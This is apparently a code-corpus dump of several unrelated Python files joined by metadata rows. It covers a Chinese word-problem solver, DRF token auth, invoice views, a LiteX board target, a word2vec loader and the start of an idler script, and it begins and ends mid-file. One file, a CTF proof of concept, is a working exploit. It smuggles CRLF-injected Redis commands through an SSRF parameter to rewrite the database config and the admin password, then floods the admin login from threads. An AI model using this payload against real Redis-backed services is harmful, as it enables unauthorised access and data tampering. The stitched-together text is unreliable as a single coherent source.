nubmerPat = re.compile("[\d0123456789〇一二三四五六七八九十零壹貳參肆伍陸柒捌玖拾廿卅貮兩百佰千仟万萬亿億兆點.]+")
def amountSTRconvert(amountSTR):
'''把 amountSTR 的數字字串,透過 Articut 的 lv3 轉為數值類型並回傳。
如此一來,就能把「兩個」變成數字 2 以便後續計算使用。'''
numberSTR = nubmerPat.match(amountSTR).group()
response = requests.post("https://api.droidtown.co/Articut/API/",
json={"username": USERNAME,
"api_key": API_KEY,
"input_str": numberSTR,
"version": "latest",
"level": "lv3",
}).json()
return numberSTR, response["number"][numberSTR]
def comparative(subject1, entity1, subject2, entity2, unit, questionDICT):
'''
計算「X 比 Y 多幾個」或是「X 比 Y 少幾個」的比較句。
'''
questionDICT["Question"].append([unit, entity1, subject1, entity2, subject2])
entityAmount = 0
subj1, ent1, ent1Amount, questionDICT = inTotal(subject1, entity1, unit, questionDICT)
questionDICT["Question"].pop()
subj2, ent2, ent2Amount, questionDICT = inTotal(subject2, entity2, unit, questionDICT)
questionDICT["Question"].pop()
entityAmount = abs(ent1Amount - ent2Amount)
questionDICT["Answer"] = {"": [unit, entityAmount]}
return entityAmount, questionDICT
def difference(subject, entity, unit, questionDICT):
'''
處理減法的計算。
'''
if entity == "":
if unit in questionDICT["Entity"]:
if len(questionDICT["Entity"][unit]) == 1:
entity = questionDICT["Entity"][unit][0]
else:
entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"].keys())+list(questionDICT["Memory"].keys())))
if entity not in entityLIST:
for ent in questionDICT["Definition"].keys():
if entity in questionDICT["Definition"][ent]:
subject = entity
entity = ent
break
for ent in questionDICT["Memory"].keys():
if entity in questionDICT["Memory"][ent]:
subject = entity
entity = ent
break
if subject == "":
if questionDICT["Definition"]:
if entity in questionDICT["Definition"]:
subject = list(questionDICT["Definition"][entity].keys())[0]
elif questionDICT["Calculation"]:
if entity in questionDICT["Calculation"]:
subject = list(questionDICT["Calculation"][entity].keys())[0]
questionDICT["Question"].append([unit, entity, subject])
entityAmount = 0
if len(questionDICT["Memory"]) == 0:
if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
for ent in questionDICT["Definition"]:
for subj in questionDICT["Definition"][ent].values():
if unit in subj:
entityAmount += subj[unit]
for ent in questionDICT["Calculation"]:
for subj in questionDICT["Calculation"][ent].values():
for v in subj:
if unit in v:
entityAmount += v[unit]
else:
if entity in questionDICT["Definition"]:
if subject in questionDICT["Definition"][entity]:
entityAmount = questionDICT["Definition"][entity][subject][unit]
else:
for subj in questionDICT["Definition"][entity].values():
entityAmount += subj[unit]
if entity in questionDICT["Calculation"]:
if subject in questionDICT["Calculation"][entity] and subject != "":
for subj in questionDICT["Calculation"][entity][subject]:
entityAmount += subj[unit]
else:
for subj in questionDICT["Calculation"][entity].values():
for v in subj:
if unit in v:
entityAmount += v[unit]
else:
if entity not in questionDICT["Definition"] and entity not in questionDICT["Memory"] and entity not in questionDICT["Calculation"]:
for ent in questionDICT["Definition"]:
for subj in questionDICT["Definition"][ent].values():
if unit in subj:
entityAmount += subj[unit]
for ent in questionDICT["Memory"]:
for subj in questionDICT["Memory"][ent].values():
for v in subj:
if unit == v:
entityAmount += subj[unit]
for ent in questionDICT["Calculation"]:
for subj in questionDICT["Calculation"][ent].values():
for v in subj:
if unit in v and "ref" not in v:
entityAmount += v[unit]
else:
if entity in questionDICT["Definition"]:
if subject in questionDICT["Definition"][entity]:
entityAmount = questionDICT["Definition"][entity][subject][unit]
else:
for subj in questionDICT["Definition"][entity].values():
entityAmount += subj[unit]
if entity in questionDICT["Memory"]:
if subject in questionDICT["Memory"][entity]:
entityAmount = questionDICT["Memory"][entity][subject][unit]
else:
for subj in questionDICT["Memory"][entity].values():
for v in subj:
if unit == v:
entityAmount += subj[unit]
if entity in questionDICT["Calculation"]:
if subject in questionDICT["Calculation"][entity]:
for subj in questionDICT["Calculation"][entity][subject]:
if "ref" not in subj:
entityAmount += subj[unit]
else:
for subj in questionDICT["Calculation"][entity].values():
for v in subj:
if unit in v and "ref" not in v:
entityAmount += v[unit]
if entity == "":
questionDICT["Answer"] = {subject: {unit: abs(entityAmount)}}
else:
questionDICT["Answer"] = {entity: {unit: abs(entityAmount)}}
return subject, entity, abs(entityAmount), questionDICT
def inTotal(subject, entity, unit, questionDICT):
'''
處理加法的計算。
'''
if entity == "":
if unit in questionDICT["Entity"]:
if len(questionDICT["Entity"][unit]) == 1:
entity = questionDICT["Entity"][unit][0]
else:
entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"].keys())+list(questionDICT["Memory"].keys())))
if entity not in entityLIST:
for ent in questionDICT["Definition"].keys():
if entity in questionDICT["Definition"][ent]:
subject = entity
entity = ent
break
for ent in questionDICT["Memory"].keys():
if entity in questionDICT["Memory"][ent]:
subject = entity
entity = ent
break
if subject == "":
if questionDICT["Definition"]:
if entity in questionDICT["Definition"] and "" in questionDICT["Definition"]:
subject = list(questionDICT["Definition"][entity].keys())[0]
elif questionDICT["Calculation"]:
if entity in questionDICT["Calculation"] and "" in questionDICT["Calculation"]:
subject = list(questionDICT["Calculation"][entity].keys())[0]
questionDICT["Question"].append([unit, entity, subject])
entityAmount = 0
if len(questionDICT["Memory"]) == 0:
if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
for ent in questionDICT["Definition"]:
for subj in questionDICT["Definition"][ent].values():
if unit in subj:
entityAmount += subj[unit]
for ent in questionDICT["Calculation"]:
for subj in questionDICT["Calculation"][ent].values():
for v in subj:
if unit in v:
entityAmount += v[unit]
else:
if entity in questionDICT["Definition"]:
if subject in questionDICT["Definition"][entity]:
entityAmount = questionDICT["Definition"][entity][subject][unit]
else:
for subj in questionDICT["Definition"][entity].values():
entityAmount += subj[unit]
if entity in questionDICT["Calculation"]:
if subject in questionDICT["Calculation"][entity] and subject != "":
for subj in questionDICT["Calculation"][entity][subject]:
entityAmount += subj[unit]
else:
for subj in questionDICT["Calculation"][entity].values():
for v in subj:
if unit in v:
entityAmount += v[unit]
else:
if entity not in questionDICT["Definition"] and entity not in questionDICT["Memory"] and entity not in questionDICT["Calculation"]:
for ent in questionDICT["Definition"]:
for subj in questionDICT["Definition"][ent].values():
if unit in subj:
entityAmount += subj[unit]
for ent in questionDICT["Memory"]:
for subj in questionDICT["Memory"][ent].values():
for v in subj:
if unit == v:
entityAmount += subj[unit]
for ent in questionDICT["Calculation"]:
for subj in questionDICT["Calculation"][ent].values():
for v in subj:
if unit in v and "ref" not in v:
entityAmount += v[unit]
else:
if entity in questionDICT["Definition"]:
if subject in questionDICT["Definition"][entity]:
entityAmount = questionDICT["Definition"][entity][subject][unit]
else:
for subj in questionDICT["Definition"][entity].values():
entityAmount += subj[unit]
if entity in questionDICT["Memory"]:
if subject in questionDICT["Memory"][entity]:
entityAmount = questionDICT["Memory"][entity][subject][unit]
else:
for subj in questionDICT["Memory"][entity].values():
for v in subj:
if unit == v:
entityAmount += subj[unit]
if entity in questionDICT["Calculation"]:
if subject in questionDICT["Calculation"][entity]:
for subj in questionDICT["Calculation"][entity][subject]:
if "ref" not in subj:
entityAmount += subj[unit]
else:
for subj in questionDICT["Calculation"][entity].values():
for v in subj:
if unit in v and "ref" not in v:
entityAmount += v[unit]
if entity == "":
questionDICT["Answer"] = {subject: {unit: abs(entityAmount)}}
else:
questionDICT["Answer"] = {entity: {unit: abs(entityAmount)}}
return subject, entity, abs(entityAmount), questionDICT
def existential(subject, entity, amount, unit, questionDICT):
'''
處理存現動詞, 也就是意思上表示「存在著」的那些動詞。
例如「桌上有兩顆蘋果」裡的 "有"。以「桌子」做為「物體存在的地點」。
同時兼容動詞的「擁有」或「持有」的動詞。
例如「妹妹有三個杯子蛋糕」裡的 "有"。以「妹妹」做為「物體存在的地點」。
'''
if entity == "":
entityLIST = list(questionDICT["Definition"].keys())
if len(entityLIST) > 0:
entity = entityLIST[0]
if unit in questionDICT["Entity"]:
if entity not in questionDICT["Entity"][unit]:
questionDICT["Entity"][unit].append(entity)
else:
questionDICT["Entity"][unit] = [entity]
if entity in questionDICT["Definition"]:
if subject in questionDICT["Definition"][entity]:
questionDICT["Definition"][entity][subject][unit] = amount
else:
questionDICT["Definition"][entity][subject] = {unit: amount}
else:
questionDICT["Definition"][entity] = {subject: {unit: amount}}
return questionDICT
def bitransitive(subject1, subject2, entity1, entity2, amount, unit, questionDICT):
'''
處理 A 比 B 多或少的題型
subject1 比 subject2 多 amount unit
entity1 比 entity2 多 amount unit
'''
entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"])+list(questionDICT["Memory"])))
subjectLIST = []
for k in ["Memory", "Definition", "Calculation"]:
for ent in entityLIST:
if ent in questionDICT[k]:
subjectLIST.extend(list(questionDICT[k][ent].keys()))
subjectLIST = list(set(subjectLIST))
if entity2 != "":
if entity1 in subjectLIST or entity2 in subjectLIST or entity2 in ["他", "她"]:
tmpEnt1 = subject1
tmpEnt2 = subject2
subject1 = entity1
subject2 = entity2
entity1 = tmpEnt1
entity2 = tmpEnt2
if subject2 != "":
if subject1 in entityLIST or subject2 in entityLIST:
tmpSubj1 = entity1
tmpSubj2 = entity2
entity1 = subject1
entity2 = subject2
subject1 = tmpSubj1
subject2 = tmpSubj2
# 把已存在的 entity1 / subject1 放入 entity2 / subject2
if entity1 in entityLIST and entity2 != "":
tmpEnt = entity1
entity1 = entity2
entity2 = tmpEnt
amount = -amount
if subject1 in subjectLIST and subject2 != "":
tmpSubj = subject1
subject1 = subject2
subject2 = tmpSubj
amount = -amount
# entity1 / subject1 空白時試著補上存在的 entity / subject
if entity1 == "":
if unit in questionDICT["Entity"]:
if len(questionDICT["Entity"][unit]) == 1:
entity1 = questionDICT["Entity"][unit][0]
if subject1 == "":
for k in ["Definition", "Memory", "Calculation"]:
if entity1 != "" and entity2 != "":
tmpEnt = entity2
else:
tmpEnt = entity1
if tmpEnt in questionDICT[k]:
subject1 = list(questionDICT[k][tmpEnt].keys())[0]
subject2 = subject1
break
# 決定 ref 是 entity 或 subject
if entity1 != "" and entity2 != "":
entity = entity2
subject = subject1
refOBJ = entity2
else:
entity = entity1
subject = subject2
refOBJ = subject2
if subject in ["", "他", "她"]:
for k in ["Definition", "Memory", "Calculation"]:
if entity in questionDICT[k]:
subjectLIST = list(questionDICT[k][entity].keys())
if len(subjectLIST) == 1 and subjectLIST[0] != "":
subject = subjectLIST[0]
refOBJ = subject
break
# 取得 ref 的 amount
refAmount = 0
for k in ["Memory", "Definition", "Calculation"]:
if entity in questionDICT[k]:
if subject in questionDICT[k][entity]:
if k == "Calculation":
refAmount = questionDICT[k][entity][subject][-1][unit]
else:
refAmount = questionDICT[k][entity][subject][unit]
break
# 算式存入 Calculation
if entity1 in questionDICT["Calculation"]:
if subject1 in questionDICT["Calculation"][entity1]:
questionDICT["Calculation"][entity1][subject1].append({unit: amount, "ref": refOBJ})
else:
questionDICT["Calculation"][entity1][subject1] = [{unit: amount, "ref": refOBJ}]
else:
questionDICT["Calculation"][entity1] = {subject1: [{unit: amount, "ref": refOBJ}]}
# 結果存入 Memory
if entity1 in questionDICT["Memory"]:
questionDICT["Memory"][entity1][subject1] = {unit: refAmount + amount}
else:
questionDICT["Memory"][entity1] = {subject1: {unit: refAmount + amount}}
if unit in questionDICT["Entity"]:
if entity1 not in questionDICT["Entity"][unit]:
questionDICT["Entity"][unit].append(entity1)
else:
questionDICT["Entity"] = {unit: [entity1]}
if refOBJ == subject:
return subject1, refOBJ, questionDICT
else:
return entity1, refOBJ, questionDICT
def transitive(subject, entity, amount, unit, questionDICT):
'''
處理及物動詞, 也就是「有受詞」的那些動作。
'''
if entity == "":
if unit in questionDICT["Entity"]:
if len(questionDICT["Entity"][unit]) == 1:
entity = questionDICT["Entity"][unit][0]
if subject in ["", "他", "她", "我", "他們", "她們", "我們"]:
if questionDICT["Definition"]:
if subject not in questionDICT["Definition"][entity]:
subject = list(questionDICT["Definition"][entity].keys())[0]
elif questionDICT["Calculation"]:
if subject not in questionDICT["Calculation"][entity]:
subject = list(questionDICT["Calculation"][entity].keys())[0]
else:
if subject in ["", "他", "她", "我", "他們", "她們", "我們"]:
if entity in questionDICT["Definition"]:
subject = list(questionDICT["Definition"][entity].keys())[0]
elif entity in questionDICT["Calculation"]:
subject = list(questionDICT["Calculation"][entity].keys())[0]
if entity in questionDICT["Calculation"]:
if subject in questionDICT["Calculation"][entity]:
questionDICT["Calculation"][entity][subject].append({unit: amount})
else:
questionDICT["Calculation"][entity][subject] = [{unit: amount}]
else:
if unit in questionDICT["Entity"]:
if entity not in questionDICT["Entity"][unit]:
questionDICT["Entity"][unit].append(entity)
else:
questionDICT["Entity"][unit] = [entity]
questionDICT["Calculation"][entity] = {subject: [{unit: amount}]}
return subject, entity, questionDICT
def intransitive(entity, questionDICT):
'''
處理不及物動詞, 也就是「沒有受詞」的那些動作。
'''
#pprint(questionDICT)
if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
primaryEnt = None
primaryAmount = None
primaryUnit = None
primarySubject = None
entAmount = 0
resultAmount = 0
for ent in questionDICT["Definition"]:
for subj in questionDICT["Definition"][ent]:
for unit in questionDICT["Definition"][ent][subj]:
if unit != "元":
if primaryEnt == None:
primarySubject = subj
primaryEnt = ent
primaryAmount = questionDICT["Definition"][ent][subj][unit]
primaryUnit = unit
entAmount += questionDICT["Definition"][ent][subj][unit]
elif unit == primaryUnit:
if primaryAmount < questionDICT["Definition"][ent][subj][unit]:
primarySubject = subj
primaryEnt = ent
primaryAmount = questionDICT["Definition"][ent][subj][unit]
primaryUnit = unit
entAmount += questionDICT["Definition"][ent][subj][unit]
for ent in questionDICT["Calculation"]:
for subj in questionDICT["Calculation"][ent]:
for v in questionDICT["Calculation"][ent][subj]:
for unit in v:
if unit != "元":
if primaryEnt == None:
primarySubject = subj
primaryEnt = ent
primaryAmount = v[unit]
primaryUnit = unit
entAmount += v[unit]
elif unit == primaryUnit:
if primaryAmount < v[unit]:
primarySubject = subj
primaryEnt = ent
primaryAmount = v[unit]
primaryUnit = unit
entAmount += v[unit]
resultAmount = primaryAmount - (entAmount - primaryAmount)
questionDICT["Calculation"][entity] = {primarySubject: [{primaryUnit: resultAmount}]}
return primaryEnt, (entAmount - primaryAmount), primaryUnit, questionDICT
| 43.345238 | 148 | 0.529113 |
954fa496fb0b4df23c4401a9fe2a772558cb0fae | 1,680 | py | Python | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null |
from rest_framework.authentication import BaseAuthentication
from rest_framework.authentication import get_authorization_header
from rest_framework import exceptions
from .models import User as UserModel
class TokenAuthentication(BaseAuthentication):
"""
Simple token based authentication.
Clients should authenticate by passing the token key in the "Authorization"
HTTP header, prepended with the string "Token ". For example:
Authorization: Token 401f7ac837da42b97f613d789819ff93537bee6a
"""
model = UserModel
"""
A custom token model may be used, but must have the following properties.
* key -- The string identifying the token
* user -- The user to which the token belongs
"""
def authenticate(self, request):
auth = get_authorization_header(request).split()
if not auth or auth[0].lower() != b'token':
return None
if len(auth) == 1:
msg = 'Invalid token header. No credentials provided.'
raise exceptions.AuthenticationFailed(msg)
elif len(auth) > 2:
msg = 'Invalid token header. Token string should not contain spaces.'
raise exceptions.AuthenticationFailed(msg)
return self.authenticate_credentials(auth[1])
def authenticate_credentials(self, token):
user = self.model.get_by_token(token=token)
if not user:
raise exceptions.AuthenticationFailed('Invalid token')
if not user.is_active:
raise exceptions.AuthenticationFailed('User inactive or deleted')
return (user, token)
def authenticate_header(self, request):
return 'Token'
| 31.698113 | 81 | 0.688095 |
7ce7aea5cd58ae1758788d52fd00c0540b898cea | 927 | py | Python | web200-4/poc.py | mehrdad-shokri/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 664 | 2016-08-23T01:03:00.000Z | 2022-03-20T17:02:45.000Z | web200-4/poc.py | CTFshow/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 12 | 2016-09-09T07:25:12.000Z | 2021-10-05T21:11:48.000Z | web200-4/poc.py | CTFshow/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 203 | 2016-10-17T02:15:33.000Z | 2021-10-17T06:36:37.000Z | import requests
import threading
def test():
while True:
try:
url = "http://web7.08067.me/web7/input"
data = {'value': 'http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20admin%20xx00%0d%0aSAVE%0d%0a:6379/foo'}
requests.post(url, data=data)
except Exception, e:
pass
def test2():
while True:
try:
url = "http://web7.08067.me/web7/admin"
data = {'passworld': 'xx00'}
text = requests.post(url, data=data).text
if 'flag' in text:
print text
except:
pass
list = []
for i in range(10):
t = threading.Thread(target=test)
t.setDaemon(True)
t.start()
list.append(t)
for i in range(10):
t = threading.Thread(target=test2)
t.setDaemon(True)
t.start()
list.append(t)
for i in list:
i.join() | 28.090909 | 168 | 0.563107 |
aada2cc349d21ebcc22520568c8ccfa148b3099b | 5,418 | py | Python | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 15 | 2020-09-02T22:17:34.000Z | 2022-02-01T20:09:10.000Z | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 18 | 2020-01-08T15:28:26.000Z | 2022-02-28T02:46:41.000Z | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 8 | 2020-09-29T08:00:24.000Z | 2022-01-16T11:58:19.000Z | import datetime as dt
from collections import defaultdict
from django.contrib import messages
from django.shortcuts import redirect, render
from django.utils.translation import gettext, ngettext
from django.views.decorators.http import require_POST
from workbench import generic
from workbench.invoices.models import Invoice
from workbench.logbook.models import LoggedCost, LoggedHours
from workbench.tools.pdf import pdf_response
from workbench.tools.xlsx import WorkbenchXLSXDocument
class InvoicePDFView(generic.DetailView):
model = Invoice
def get(self, request, *args, **kwargs):
self.object = self.get_object()
pdf, response = pdf_response(
self.object.code,
as_attachment=request.GET.get("disposition") == "attachment",
)
pdf.init_letter()
pdf.process_invoice(self.object)
pdf.generate()
return response
class InvoiceXLSXView(generic.DetailView):
model = Invoice
def get(self, request, *args, **kwargs):
self.object = self.get_object()
data = [
[
gettext("service"),
gettext("description"),
gettext("rendered on"),
gettext("effort type"),
gettext("hourly rate"),
gettext("hours"),
gettext("cost"),
],
[],
]
hours = defaultdict(list)
cost = defaultdict(list)
for entry in LoggedHours.objects.filter(
invoice_service__invoice=self.object
).reverse():
hours[entry.invoice_service_id].append(entry)
for entry in LoggedCost.objects.filter(
invoice_service__invoice=self.object
).reverse():
cost[entry.invoice_service_id].append(entry)
for service in self.object.services.all():
data.append(
[
service.title,
service.description,
"",
service.effort_type,
service.effort_rate,
"",
"",
]
)
for entry in hours[service.id]:
data.append(
[
"",
entry.description,
entry.rendered_on,
"",
"",
entry.hours,
entry.hours * service.effort_rate
if service.effort_rate
else "",
]
)
for entry in cost[service.id]:
data.append(
["", entry.description, entry.rendered_on, "", "", "", entry.cost]
)
data.append([])
xlsx = WorkbenchXLSXDocument()
xlsx.add_sheet(gettext("logbook"))
xlsx.table(None, data)
return xlsx.to_response("%s.xlsx" % self.object.code)
class RecurringInvoiceDetailView(generic.DetailView):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
if request.GET.get("create_invoices"):
invoices = self.object.create_invoices()
messages.info(
request,
ngettext("Created %s invoice.", "Created %s invoices.", len(invoices))
% len(invoices),
)
return redirect("invoices_invoice_list" if len(invoices) else self.object)
context = self.get_context_data()
return self.render_to_response(context)
def reminders(request):
invoices = Invoice.objects.overdue().select_related(
"customer", "owned_by", "project"
)
by_organization = {}
for invoice in invoices:
if invoice.customer not in by_organization:
by_organization[invoice.customer] = {
"organization": invoice.customer,
"last_reminded_on": {invoice.last_reminded_on},
"invoices": [invoice],
}
else:
row = by_organization[invoice.customer]
row["invoices"].append(invoice)
row["last_reminded_on"].add(invoice.last_reminded_on)
def last_reminded_on(row):
days = row["last_reminded_on"] - {None}
return max(days) if days else None
reminders = [
dict(
row,
last_reminded_on=last_reminded_on(row),
total_excl_tax=sum(invoice.total_excl_tax for invoice in row["invoices"]),
)
for row in by_organization.values()
]
return render(
request,
"invoices/reminders.html",
{
"reminders": sorted(
reminders,
key=lambda row: (
row["last_reminded_on"] or dt.date.min,
row["organization"].name,
),
)
},
)
@require_POST
def dunning_letter(request, customer_id):
invoices = (
Invoice.objects.overdue()
.filter(customer=customer_id)
.select_related("customer", "contact__organization", "owned_by", "project")
)
pdf, response = pdf_response("reminders", as_attachment=True)
pdf.dunning_letter(invoices=list(invoices))
pdf.generate()
invoices.update(last_reminded_on=dt.date.today())
return response
| 30.438202 | 86 | 0.547988 |
9e2907dfb6eae60c8ce313b4e2c952b6005c906d | 7,100 | py | Python | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | 2 | 2021-06-30T22:07:37.000Z | 2022-02-02T06:10:32.000Z | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | null | null | null | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
#
# This file is part of LiteX-Boards.
#
# Copyright (c) 2020 Florent Kermarrec <florent@enjoy-digital.fr>
# SPDX-License-Identifier: BSD-2-Clause
import os
import argparse
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex_boards.platforms import xcu1525
from litex.soc.cores.clock import *
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.cores.led import LedChaser
from litedram.modules import MT40A512M8
from litedram.phy import usddrphy
from litepcie.phy.usppciephy import USPPCIEPHY
from litepcie.software import generate_litepcie_software
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
def __init__(self, platform, sys_clk_freq, ddram_channel):
self.rst = Signal()
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_sys4x = ClockDomain(reset_less=True)
self.clock_domains.cd_pll4x = ClockDomain(reset_less=True)
self.clock_domains.cd_idelay = ClockDomain()
# # #
self.submodules.pll = pll = USPMMCM(speedgrade=-2)
self.comb += pll.reset.eq(self.rst)
pll.register_clkin(platform.request("clk300", ddram_channel), 300e6)
pll.create_clkout(self.cd_pll4x, sys_clk_freq*4, buf=None, with_reset=False)
pll.create_clkout(self.cd_idelay, 500e6)
platform.add_false_path_constraints(self.cd_sys.clk, pll.clkin) # Ignore sys_clk to pll.clkin path created by SoC's rst.
self.specials += [
Instance("BUFGCE_DIV", name="main_bufgce_div",
p_BUFGCE_DIVIDE=4,
i_CE=1, i_I=self.cd_pll4x.clk, o_O=self.cd_sys.clk),
Instance("BUFGCE", name="main_bufgce",
i_CE=1, i_I=self.cd_pll4x.clk, o_O=self.cd_sys4x.clk),
]
self.submodules.idelayctrl = USPIDELAYCTRL(cd_ref=self.cd_idelay, cd_sys=self.cd_sys)
# BaseSoC ------------------------------------------------------------------------------------------
class BaseSoC(SoCCore):
def __init__(self, sys_clk_freq=int(125e6), ddram_channel=0, with_pcie=False, with_sata=False, **kwargs):
platform = xcu1525.Platform()
# SoCCore ----------------------------------------------------------------------------------
SoCCore.__init__(self, platform, sys_clk_freq,
ident = "LiteX SoC on XCU1525",
ident_version = True,
**kwargs)
# CRG --------------------------------------------------------------------------------------
self.submodules.crg = _CRG(platform, sys_clk_freq, ddram_channel)
# DDR4 SDRAM -------------------------------------------------------------------------------
if not self.integrated_main_ram_size:
self.submodules.ddrphy = usddrphy.USPDDRPHY(
pads = platform.request("ddram", ddram_channel),
memtype = "DDR4",
sys_clk_freq = sys_clk_freq,
iodelay_clk_freq = 500e6)
self.add_sdram("sdram",
phy = self.ddrphy,
module = MT40A512M8(sys_clk_freq, "1:4"),
size = 0x40000000,
l2_cache_size = kwargs.get("l2_size", 8192)
)
# Workadound for Vivado 2018.2 DRC, can be ignored and probably fixed on newer Vivado versions.
platform.add_platform_command("set_property SEVERITY {{Warning}} [get_drc_checks PDCN-2736]")
# PCIe -------------------------------------------------------------------------------------
if with_pcie:
self.submodules.pcie_phy = USPPCIEPHY(platform, platform.request("pcie_x4"),
data_width = 128,
bar0_size = 0x20000)
self.add_pcie(phy=self.pcie_phy, ndmas=1)
# SATA -------------------------------------------------------------------------------------
if with_sata:
from litex.build.generic_platform import Subsignal, Pins
from litesata.phy import LiteSATAPHY
# IOs
_sata_io = [
# SFP 2 SATA Adapter / https://shop.trenz-electronic.de/en/TE0424-01-SFP-2-SATA-Adapter
("qsfp2sata", 0,
Subsignal("tx_p", Pins("N9")),
Subsignal("tx_n", Pins("N8")),
Subsignal("rx_p", Pins("N4")),
Subsignal("rx_n", Pins("N3")),
),
]
platform.add_extension(_sata_io)
# RefClk, Generate 150MHz from PLL.
self.clock_domains.cd_sata_refclk = ClockDomain()
self.crg.pll.create_clkout(self.cd_sata_refclk, 150e6)
sata_refclk = ClockSignal("sata_refclk")
# PHY
self.submodules.sata_phy = LiteSATAPHY(platform.device,
refclk = sata_refclk,
pads = platform.request("qsfp2sata"),
gen = "gen2",
clk_freq = sys_clk_freq,
data_width = 16)
# Core
self.add_sata(phy=self.sata_phy, mode="read+write")
# Leds -------------------------------------------------------------------------------------
self.submodules.leds = LedChaser(
pads = platform.request_all("user_led"),
sys_clk_freq = sys_clk_freq)
# Build --------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="LiteX SoC on XCU1525")
parser.add_argument("--build", action="store_true", help="Build bitstream")
parser.add_argument("--load", action="store_true", help="Load bitstream")
parser.add_argument("--sys-clk-freq", default=125e6, help="System clock frequency (default: 125MHz)")
parser.add_argument("--ddram-channel", default="0", help="DDRAM channel (default: 0)")
parser.add_argument("--with-pcie", action="store_true", help="Enable PCIe support")
parser.add_argument("--driver", action="store_true", help="Generate PCIe driver")
parser.add_argument("--with-sata", action="store_true", help="Enable SATA support (over SFP2SATA)")
builder_args(parser)
soc_core_args(parser)
args = parser.parse_args()
soc = BaseSoC(
sys_clk_freq = int(float(args.sys_clk_freq)),
ddram_channel = int(args.ddram_channel, 0),
with_pcie = args.with_pcie,
with_sata = args.with_sata,
**soc_core_argdict(args)
)
builder = Builder(soc, **builder_argdict(args))
builder.build(run=args.build)
if args.driver:
generate_litepcie_software(soc, os.path.join(builder.output_dir, "driver"))
if args.load:
prog = soc.platform.create_programmer()
prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bit"))
if __name__ == "__main__":
main()
| 42.51497 | 128 | 0.547606 |
f4a869e817e6cb41d286746960bb532392db8df1 | 753 | py | Python | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 14 | 2018-10-05T00:16:05.000Z | 2021-01-15T08:24:40.000Z | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 2 | 2018-11-29T13:21:31.000Z | 2018-12-07T02:49:03.000Z | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 6 | 2019-01-11T10:33:04.000Z | 2021-02-26T03:52:38.000Z | import numpy as np
EMBED_DIM=128
def load_word2vec_embeddings(dictionary, vocab_embed_file):
if vocab_embed_file is None: return None, EMBED_DIM
fp = open(vocab_embed_file)
info = fp.readline().split()
embed_dim = int(info[1])
vocab_embed = {}
for line in fp:
line = line.split()
vocab_embed[line[0]] = np.array(map(float, line[1:]), dtype='float32')
fp.close()
vocab_size = len(dictionary)
W = np.random.randn(vocab_size, embed_dim).astype('float32')
n = 0
for w, i in dictionary.iteritems():
if w in vocab_embed:
W[i,:] = vocab_embed[w]
n += 1
print "%d/%d vocabs are initialized with word2vec embeddings." % (n, vocab_size)
return W, embed_dim
| 26.892857 | 84 | 0.632138 |
1bb9f76ad07c5a8dae45150e4293d491e3e7038c | 94,050 | py | Python | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2021 Robert Osborne
#
# python3 idler.py --help
#
import argparse
import textwrap
import time
import sys
import os
import configparser
import datetime
import distutils
import json
import math
import glob
import shutil
import pyautogui
import pygetwindow as gw
from PIL import Image, ImageChops, ImageStat
from pathlib import Path
from PIL import ImageGrab
from functools import partial
ImageGrab.grab = partial(ImageGrab.grab, all_screens=True)
# GLOBALS
# Yeah, yeah, globals are bad, sue me
config = configparser.ConfigParser()
top_x = 0
top_y = 0
screen_scale = 2
infinite_loop = False
